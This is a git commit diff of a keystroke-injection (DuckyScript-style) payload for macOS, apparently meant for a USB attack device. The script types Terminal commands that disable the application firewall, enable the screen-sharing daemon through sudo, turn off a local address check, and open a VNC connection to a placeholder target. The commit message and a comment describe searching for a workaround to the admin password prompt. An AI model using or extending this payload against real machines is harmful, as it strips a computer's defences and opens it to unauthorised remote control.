must enter admin password. Trying to find a workout

This commit is contained in:
Narstybits
2023-05-31 10:36:54 -05:00
parent ee7d589ed9
commit 67caad58e6
+10 -2
View File
@@ -36,11 +36,19 @@ DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off
DELAY 500
STRING sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.screensharing.plist
REM must enter admin password. Trying to find a workout
DELAY 7000
ENTER
DELAY 1000
STRING /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off
DELAY 3000
ENTER
DELAY 500
STRING defaults write com.apple.ScreenSharing skipLocalAddressCheck -bool true
DELAY 3000
ENTER
DELAY 500
STRING open vnc://target_ip_address
DELAY 500